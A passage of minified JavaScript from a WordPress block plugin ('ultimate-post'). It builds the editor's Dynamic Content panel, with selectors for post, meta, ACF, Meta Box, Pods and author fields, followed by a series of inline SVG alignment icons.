P="heading"===l&&e.isActive&&t.attributes.dcEnabled||"field"===l&&(i?t.attributes.dcEnabled[i]:t.attributes.dcEnabled);let L=!1;return((["current_post","post_type"].includes(y.dataSrc)&&!d?.linkOnly?""===y.contentSrc:""===y.dataSrc)||(d?.linkOnly||!d?.disableLink&&y.linkEnabled)&&""===y.linkSrc)&&(L=!0),(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-dynamic-content-fields"},(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,labelPosition:"side",label:__("Data Source","ultimate-post"),value:y.dataSrc,onChange:e=>{b((t=>({...t,contentSrc:"",searchValue:[],postId:"",postType:"",dataSrc:e})))}},(0,o.createElement)(r.yN,{config:d,type:l})),"post_type"===y.dataSrc&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,labelPosition:"side",label:__("Select Post Type","ultimate-post"),value:y.postType,onChange:e=>{b((t=>({...t,postId:"",searchValue:[],contentSrc:"",linkSrc:"",postType:e})))}},(0,o.createElement)(r.Bb,null)),""!==y.postType&&(0,o.createElement)(r.o3,{opts:y,setOpts:b})),("current_post"===y.dataSrc||"post_type"===y.dataSrc&&""!==y.postType&&""!==y.postId)&&(0,o.createElement)(o.Fragment,null,!d?.linkOnly&&(0,o.createElement)(r.G5,{opts:y,setOpts:b,type:null!==(g=d?.fieldType)&&void 0!==g?g:"text",req:function(e){const o={};o.post_type="toolbar"===l?"post_type"===y.dataSrc?y.postType:t.attributes.queryType:"current_post"===y.dataSrc?wp.data.select("core/editor").getCurrentPostType():y.postType;const a=null!==(e=d?.fieldType)&&void 0!==e?e:"text";return o.acf_field_type=a,("toolbar"!==l||"toolbar"===l&&"post_type"===y.dataSrc)&&(o.post_id=E),o}()})),!d?.disableLink&&""!==y.dataSrc&&(0,o.createElement)(o.Fragment,null,!d?.linkOnly&&(0,o.createElement)(f,{__nextHasNoMarginBottom:!0,checked:y.linkEnabled,label:__("Enable Link","ultimate-post"),onChange:e=>b((t=>({...t,linkEnabled:e,linkSrc:""})))}),(y.linkEnabled||d?.linkOnly)&&(0,o.createElement)(r.jk,{opts:y,setOpts:b,req:function(){const e={};return e.post_type="toolbar"===l?t.attributes.queryType:"current_post"===y.dataSrc?wp.data.select("core/editor").getCurrentPostType():y.postType,e.acf_field_type="url","toolbar"!==l&&(e.post_id=E),e}()})),!d?.disableAdv&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(k,{title:__("Advanced","ultimate-post"),initialOpen:!1},(0,o.createElement)(r.nv,{value:y.beforeText,onChange:e=>{b((t=>({...t,beforeText:e})))},label:__("Before Text","ultimate-post")}),(0,o.createElement)(r.nv,{value:y.afterText,onChange:e=>{b((t=>({...t,afterText:e})))},label:__("After Text","ultimate-post")}),(0,o.createElement)(r.nv,{value:y.fallback,onChange:e=>{b((t=>({...t,fallback:e})))},label:__("Fallback","ultimate-post")}),d?.icon&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-dc-icon-control"},(0,o.createElement)(n.Z,{value:y.icon,label:__("Icon","ultimate-post"),isSocial:!1,inline:!1,dynamicClass:"",onChange:e=>b((t=>({...t,icon:e})))}))),(0,o.createElement)(w,{min:1,labelPosition:"side",value:y.maxCharLen,onChange:e=>{b((t=>({...t,maxCharLen:String(e)})))},label:__("Max Length","ultimate-post")}))),(0,o.createElement)(h,{className:"ultp-dynamic-content-dropdown-button",variant:"primary",onClick:()=>S(!0),isBusy:T,disabled:L},__("Apply","ultimate-post")),P&&(0,o.createElement)(h,{style:{marginTop:"24px"},isDestructive:!0,className:"ultp-dynamic-content-dropdown-button",variant:"secondary",onClick:()=>S(!1),isBusy:T},__("Reset","ultimate-post"))),!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-dyanmic-content-pro"},(0,o.createElement)("span",null,__("Get ACF Integration & Meta Box Access","ultimate-post")),(0,o.createElement)("a",{href:r.rj,target:"_blank",className:"ultp-dyanmic-content-pro-link",rel:"noreferrer"},(0,o.createElement)("span",null,__("Upgrade to PRO","ultimate-post")),(0,o.createElement)("svg",{width:14,height:14,viewBox:"0 0 14 14",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M6.08594 0.707031H13.293V7.91406L11.5 7V4.22266L6.47266 9.25L5.20703 7.98438L10.6562 2.5H7L6.08594 0.707031ZM8.79297 11.5V8.79297L10.5859 7V13.293H0.707031V3.41406H7.91406L6.08594 5.20703H2.5V11.5H8.79297Z"})))))}},69735:(e,t,l)=>{"use strict";l.d(t,{Ic:()=>c,KF:()=>u,dh:()=>d,o6:()=>m});var o=l(67294),a=l(74971);const{__}=wp.i18n,{useSelect:i}=wp.data,{registerFormatType:n}=wp.richText,r=__("Dynamic Content","ultimate-post"),s=["ultimate-post/heading","ultimate-post/list","ultimate-post/button"],p=(e,t,l)=>(e.splice(l,0,e.splice(t,1)[0]),e),c=e=>{const{attributes:t,setAttributes:l,setSelectedDc:o,selectedDC:i,layoutContext:n}=e,{dcFields:r}=t;return{moveMetaGroupUp:e=>{const t=Math.min(...[n.slice(0,e).reverse().findIndex((e=>e)),r.slice(0,e).reverse().findIndex((e=>e))].filter((e=>e>=0))),a=r.length,i=e-(t+1);if(i>=0&&i<a){const t=[...r];p(t,e,i),l({dcFields:t}),o(i)}},moveMetaGroupDown:e=>{const t=Math.min(...[n.slice(e,n.length).findIndex((e=>e)),r.slice(e+1,r.length).findIndex((e=>e))].filter((e=>e>=0))),a=r.length,i=e+t+1;if(i>=0&&i<a){const t=[...r];p(t,e,i),l({dcFields:t}),o(i)}},removeMetaGroup:e=>{if(Number.isInteger(e)){const t=[...r];t[e]=null,l({dcFields:t}),o(""),wp.data.dispatch("core/block-editor").clearSelectedBlock()}},addMeta:e=>{if(Number.isInteger(e)){const t=[...r];t[e].fields.push((0,a.rB)()),l({dcFields:t})}},removeMeta:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)){const a=[...r];a[e].fields.splice(t,1),0===a[e].fields.length&&(a[e]=null),l({dcFields:a}),o(""),wp.data.dispatch("core/block-editor").clearSelectedBlock()}},moveMetaUp:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)&&t>0){const a=[...r];p(a[e].fields,t,t-1),l({dcFields:a}),o(`${e},${t-1}`)}},moveMetaDown:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)){const a=[...r];t<a[e].fields.length-1&&(p(a[e].fields,t,t+1),l({dcFields:a}),o(`${e},${t+1}`))}}}},u={dc:{type:"object",default:a.sN},dcEnabled:{type:"boolean",default:!1}},d={dc:{type:"object",default:{imageUpload:a.sN,darkImage:a.sN,imgLink:a.sN,btnLink:a.sN}},dcEnabled:{type:"object",default:{imageUpload:!1,darkImage:!1,imgLink:!1,btnLink:!1}}};function m(){return"true"===ultp_data?.settings?.ultp_dynamic_content&&wp.data.select("core/editor")}m()&&n("ultimate-post/dynamic-content",{title:r,tagName:"span",className:"ultp-richtext-dynamic-content",edit(e){const{isActive:t,value:l}=e,n=i((e=>e("core/block-editor").getSelectedBlock()),[]);return n&&!s.includes(n.name)?null:(0,o.createElement)(a.ZP,{isActive:t,richTextProps:e,headingBlock:n,type:"heading"})}})},22465:(e,t,l)=>{"use strict";l.d(t,{AF:()=>y,BQ:()=>d,Bb:()=>x,Bj:()=>v,El:()=>b,G5:()=>S,Ix:()=>m,_P:()=>u,jk:()=>P,nv:()=>k,o3:()=>T,rj:()=>f,uZ:()=>h,uy:()=>g,yN:()=>w});var o=l(87462),a=l(67294),i=l(30319),n=l(68073),r=l(22217),s=l(83100);const{__}=wp.i18n,{useSelect:p}=wp.data,{TextControl:c}=wp.components,u="cmeta_",d="acf_",m="mb_",g="pods_",y="post_",b="a_",v="site_",h="link_",f=(0,s.Z)(null,"dc",ultp_data.affiliate_id);function k(e){return(0,a.createElement)("div",{className:"ultp-dynamic-content-textfield"},(0,a.createElement)("label",null,e.label),(0,a.createElement)(c,(0,o.Z)({},e,{label:void 0,__nextHasNoMarginBottom:!0})))}function w({config:e,type:t}){return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("option",{value:""},__("None","ultimate-post")),(0,a.createElement)("option",{value:"current_post"},__("Current Post","ultimate-post")),(0,a.createElement)("option",{value:"post_type"},__("Post Type","ultimate-post")),!e?.linkOnly&&"image"!==e?.fieldType&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("optgroup",{label:__("Archive","ultimate-post")},(0,a.createElement)("option",{value:v+"arc_desc"},__("Archive Description","ultimate-post")),(0,a.createElement)("option",{value:v+"arc_title"},__("Archive Title","ultimate-post"))),(0,a.createElement)("optgroup",{label:__("Site","ultimate-post")},(0,a.createElement)("option",{value:v+"tagline"},__("Site Tagline","ultimate-post")),(0,a.createElement)("option",{value:v+"title"},__("Site Title","ultimate-post")))))}function x(){const e=p((e=>e(i.$6).getPostTypes())),t=p((e=>e(i.$6).hasFinishedResolution("getPostTypes")));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("option",{value:"",disabled:!0},__("Choose","ultimate-post")),t?e?.length?e?.map((e=>(0,a.createElement)("option",{key:e.value,value:e.value},e.label))):(0,a.createElement)("option",{value:"no-data",disabled:!0},__("No Post Types Found","ultimate-post")):(0,a.createElement)("option",{value:"loading",disabled:!0},__("Loading…","ultimate-post")))}function T({opts:e,setOpts:t}){var l;return(0,a.createElement)(n.Z,{label:__("Select Post","ultimate-post"),value:null!==(l=e?.searchValue)&&void 0!==l?l:[],search:"postExclude",single:!0,condition:e.postType,noIdInTitle:!0,onChange:e=>{t((t=>({...t,contentSrc:"",postId:void 0!==e[0]?e[0].value:"",searchValue:e})))}})}const _=[{label:__("Post Title","ultimate-post"),value:y+"title"},{label:__("Post Excerpt","ultimate-post"),value:y+"excerpt"},{label:__("Post Date","ultimate-post"),value:y+"date"},{label:__("Post Id","ultimate-post"),value:y+"id"},{label:__("Post Number of Comments","ultimate-post"),value:y+"comments"}],C=[{label:__("Name","ultimate-post"),value:b+"display_name"},{label:__("First Name","ultimate-post"),value:b+"first_name"},{label:__("Last Name","ultimate-post"),value:b+"last_name"},{label:__("Nickname","ultimate-post"),value:b+"nickname"},{label:__("Bio","ultimate-post"),value:b+"description"},{label:__("Email","ultimate-post"),value:b+"email"},{label:__("Website","ultimate-post"),value:b+"url"}],E=[{label:__("Post Feature Image","ultimate-post"),value:h+"post_featured_image"},{label:__("Author Profile Image","ultimate-post"),value:h+"a_profile"}];function S({req:e,type:t,opts:l,setOpts:o}){const{options:{acfFields:n,cMetaFields:s,mbFields:c,podsFields:y},error:b,hasResolved:v}=p((t=>t(i.$6).getCustomFields(e)),[e]),h=[{value:"",label:__("Choose","ultimate-post")},{value:"",label:__("Post","ultimate-post"),isHeader:!0}];return("image"===t?E:_).map((e=>{h.push({value:e.value,label:e.label,isChild:!0})})),h.push({value:"",label:__("Post Meta","ultimate-post"),isHeader:!0}),v?s?.length?s?.map((e=>{h.push({value:u+e.value,label:e.label,isChild:!0})})):h.push({value:"no-data",label:__("No Post Meta Found","ultimate-post"),isChild:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0}),h.push({value:"",label:__("ACF","ultimate-post"),isHeader:!0,pro:!0}),v?n?.length?n?.map((e=>{h.push({value:d+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No ACF Data Found","ultimate-post"),isChild:!0,disabled:!0,pro:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0,pro:!0}),h.push({value:"",label:__("Meta Box","ultimate-post"),isHeader:!0,pro:!0}),v?c?.length?c?.map((e=>{h.push({value:m+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No Meta Box Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),h.push({value:"",label:__("Pods","ultimate-post"),isHeader:!0,pro:!0}),v?y?.length?y?.map((e=>{h.push({value:g+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No Pods Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),h.push({value:"",label:__("Author","ultimate-post"),isHeader:!0}),"image"!==t&&C.map((e=>{h.push({value:e.value,label:e.label,isChild:!0})})),(0,a.createElement)(r.Z,{beside:!0,label:__("Content Source","ultimate-post"),value:l.contentSrc,onChange:e=>{o((t=>({...t,contentSrc:e})))},options:h,responsive:!1,proLink:f})}function P({req:e,opts:t,setOpts:l}){const{options:{acfFields:o,cMetaFields:n,mbFields:s,podsFields:c},error:y,hasResolved:b}=p((t=>t(i.$6).getCustomFields(e)),[e]),v=[{value:"",label:__("None","ultimate-post")},{value:"",label:__("Post","ultimate-post"),isHeader:!0},{value:h+"post_permalink",label:__("Post Permalink","ultimate-post"),isChild:!0},{value:h+"post_permalink",label:__("Post Comments","ultimate-post"),isChild:!0},{value:"",label:__("Post Meta","ultimate-post"),isHeader:!0}];return b?n?.length?n?.map((e=>{v.push({value:u+e.value,label:e.label,isChild:!0})})):v.push({value:"no-data",label:__("No Post Meta Found","ultimate-post"),isChild:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0}),v.push({value:"",label:__("ACF","ultimate-post"),isHeader:!0,pro:!0}),b?o?.length?o?.map((e=>{v.push({value:d+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No ACF Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Meta Box","ultimate-post"),isHeader:!0,pro:!0}),b?s?.length?s?.map((e=>{v.push({value:m+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No Meta Box Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Pods","ultimate-post"),isHeader:!0,pro:!0}),b?c?.length?c?.map((e=>{v.push({value:g+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No Pods Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Author","ultimate-post"),isHeader:!0},{value:h+"a_profile",label:__("Avatar (Profile URL)","ultimate-post"),isChild:!0},{value:h+"a_arc",label:__("Author Archive URL","ultimate-post"),isChild:!0},{value:h+"a_page",label:__("Author Page URL","ultimate-post"),isChild:!0}),(0,a.createElement)(r.Z,{beside:!0,label:__("Link Source","ultimate-post"),value:t.linkSrc,onChange:e=>{l((t=>({...t,linkEnabled:!0,linkSrc:e})))},options:v,responsive:!1,proLink:f})}},48054:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(56834);const i={left:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 15.75H8.25",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 6.75H8.25",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),center:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6 15.75H12",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6 6.75H12",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),right:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.75 15.75H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.75 6.75H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),justify:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{clipRule:"evenodd",fillRule:"evenodd",d:"M4 5h16v2H4V5zm0 4v2h16V9H4zm0 4h16v2H4v-2zm16 6H4v-2h16v2z"})),juststart:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 16.5L3 1.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"6.00195",y:"14.25",width:"3.75",height:"9",rx:"0.75",transform:"rotate(-90 6.00195 14.25)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"6.00195",y:"7.5",width:"3.75",height:"6",rx:"0.75",transform:"rotate(-90 6.00195 7.5)",stroke:"currentColor",strokeWidth:"1.125"})),justcenter:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9 1.5L9 16.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"15",y:"3.75",width:"3.75",height:"12",rx:"0.75",transform:"rotate(90 15 3.75)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"12.75",y:"10.5",width:"3.75",height:"7.5",rx:"0.75",transform:"rotate(90 12.75 10.5)",stroke:"currentColor",strokeWidth:"1.125"})),justend:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M15 1.5L15 16.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"11.998",y:"3.75",width:"3.75",height:"9",rx:"0.75",transform:"rotate(90 11.998 3.75)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"11.998",y:"10.5",width:"3.75",height:"6",rx:"0.75",transform:"rotate(90 11.998 10.5)",stroke:"currentColor",strokeWidth:"1.125"})),justevenly:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1448.977 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1523.787 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 754.579 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1448.976 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 743.782 129.4105)"}))),justaround:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1260.211 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1335.022 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 662.1925 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1260.211 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 647.4025 129.4105)"}))),justbetween:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1025.441 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1100.253 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 548.308 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1025.441 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 526.5175 129.4105)"}))),algnStart:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M1.50195 3L16.502 3",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"3.75195",y:"6",width:"3.75",height:"9",rx:"0.75",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"10.502",y:"6",width:"3.75",height:"6",rx:"0.75",stroke:"currentColor",strokeWidth:"1.125"})),algnEnd:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.5 15L1.5 15",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"14.25",y:"12",width:"3.75",height:"9",rx:"0.75",transform:"rotate(-180 14.25 12)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"7.5",y:"12",width:"3.75",height:"6",rx:"0.75",transform:"rotate(-180 7.5 12)",stroke:"currentColor",strokeWidth:"1.125"})),algnCenter:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.5 9L1.5 9",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"14.25",y:"15",width:"3.75",height:"12",rx:"0.75",transform:"rotate(-180 14.25 15)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"7.5",y:"12.75",width:"3.75",height:"7.5",rx:"0.75",transform:"rotate(-180 7.5 12.75)",stroke:"currentColor",strokeWidth:"1.125"})),stretch:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",null,(0,o.createElement)("g",{transform:"translate(-1022.434 -406.799)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"86.827",height:"6",rx:"3",transform:"translate(1022.434 481.61)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(-90 760.9365 -282.9625)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"86.827",height:"6",rx:"3",transform:"translate(1022.434 406.799)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(-90 739.146 -304.753)"})))),flow:(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.31212 9L1 10.5094L4.77355 13.7897L6.28297 15.1018L7.59509 13.5924L9.13456 11.8214L11.3988 13.7897L12.9082 15.1018L14.2203 13.5924L15.7584 11.823L18.0209 13.7897L19.5303 15.1018L20.8424 13.5924L22.8106 11.3283L21.3012 10.0162L19.333 12.2803L15.5594 9L14.2473 10.5094L14.249 10.5109L12.7109 12.2803L8.93736 9L8.05395 10.0163L6.08567 12.2803L2.31212 9Z"})),left_new:(0,o.createElement)("svg",{viewBox:"0 0 24 24",width:24,height:24,xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3.25 21V3h1.5v18h-1.5ZM8 11.25A1.75 1.75 0 0 1 6.25 9.5V7c0-.966.784-1.75 1.75-1.75h11c.966 0 1.75.784 1.75 1.75v2.5A1.75 1.75 0 0 1 19 11.25H8ZM7.75 9.5c0 .138.112.25.25.25h11a.25.25 0 0 0 .25-.25V7a.25.25 0 0 0-.25-.25H8a.25.25 0 0 0-.25.25v2.5ZM8 18.75A1.75 1.75 0 0 1 6.25 17v-2.5c0-.966.784-1.75 1.75-1.75h6c.966 0 1.75.784 1.75 1.75V17A1.75 1.75 0 0 1 14 18.75H8ZM7.75 17c0 .138.112.25.25.25h6a.25.25 0 0 0 .25-.25v-2.5a.25.25 0 0 0-.25-.25H8a.25.25 0 0 0-.25.25V17Z"})),justbetween_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 21V3h-1.5v18h1.5ZM3.75 21V3h-1.5v18h1.5ZM10.75 8A1.75 1.75 0 0 0 9 6.25H7A1.75 1.75 0 0 0 5.25 8v8c0 .966.784 1.75 1.75 1.75h2A1.75 1.75 0 0 0 10.75 16V8ZM9 7.75a.25.25 0 0 1 .25.25v8a.25.25 0 0 1-.25.25H7a.25.25 0 0 1-.25-.25V8A.25.25 0 0 1 7 7.75h2ZM18.75 8A1.75 1.75 0 0 0 17 6.25h-2A1.75 1.75 0 0 0 13.25 8v8c0 .966.784 1.75 1.75 1.75h2A1.75 1.75 0 0 0 18.75 16V8ZM17 7.75a.25.25 0 0 1 .25.25v8a.25.25 0 0 1-.25.25h-2a.25.25 0 0 1-.25-.25V8a.25.25 0 0 1 .25-.25h2Z"})),center_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M18 5.25h-5.25V3h-1.5v2.25H6A1.75 1.75 0 0 0 4.25 7v2.5c0 .966.784 1.75 1.75 1.75h5.25v1.5H9a1.75 1.75 0 0 0-1.75 1.75V17c0 .966.784 1.75 1.75 1.75h2.25V21h1.5v-2.25H15A1.75 1.75 0 0 0 16.75 17v-2.5A1.75 1.75 0 0 0 15 12.75h-2.25v-1.5H18a1.75 1.75 0 0 0 1.75-1.75V7A1.75 1.75 0 0 0 18 5.25Zm.25 4.25a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V7A.25.25 0 0 1 6 6.75h12a.25.25 0 0 1 .25.25v2.5ZM15 17.25a.25.25 0 0 0 .25-.25v-2.5a.25.25 0 0 0-.25-.25H9a.25.25 0 0 0-.25.25V17c0 .138.112.25.25.25h6Z"})),right_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.75 21V3h-1.5v18h1.5ZM16 11.25a1.75 1.75 0 0 0 1.75-1.75V7A1.75 1.75 0 0 0 16 5.25H5A1.75 1.75 0 0 0 3.25 7v2.5c0 .966.784 1.75 1.75 1.75h11Zm.25-1.75a.25.25 0 0 1-.25.25H5a.25.25 0 0 1-.25-.25V7A.25.25 0 0 1 5 6.75h11a.25.25 0 0 1 .25.25v2.5ZM16 18.75A1.75 1.75 0 0 0 17.75 17v-2.5A1.75 1.75 0 0 0 16 12.75h-6a1.75 1.75 0 0 0-1.75 1.75V17c0 .966.784 1.75 1.75 1.75h6Zm.25-1.75a.25.25 0 0 1-.25.25h-6a.25.25 0 0 1-.25-.25v-2.5a.25.25 0 0 1 .25-.25h6a.25.25 0 0 1 .25.25V17Z"})),alignStretch:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 21V3h-1.5v18h1.5ZM3.75 21V3h-1.5v18h1.5ZM17.5 10.75c.69 0 1.25-.56 1.25-1.25v-3c0-.69-.56-1.25-1.25-1.25h-11c-.69 0-1.25.56-1.25 1.25v3c0 .69.56 1.25 1.25 1.25h11Zm-.25-1.5H6.75v-2.5h10.5v2.5ZM17.5 18.75c.69 0 1.25-.56 1.25-1.25v-3c0-.69-.56-1.25-1.25-1.25h-11c-.69 0-1.25.56-1.25 1.25v3c0 .69.56 1.25 1.25 1.25h11Zm-.25-1.5H6.75v-2.5h10.5v2.5Z"})),alignCenterR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3 11.25h3v1.5H3v-1.5ZM18 11.25h3v1.5h-3v-1.5ZM10.5 11.25h3v1.5h-3v-1.5Z"}),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12.75 18c0 .97.78 1.75 1.75 1.75H17c.97 0 1.75-.78 1.75-1.75V6c0-.97-.78-1.75-1.75-1.75h-2.5c-.97 0-1.75.78-1.75 1.75v12Zm1.75.25a.25.25 0 0 1-.25-.25V6c0-.14.11-.25.25-.25H17c.14 0 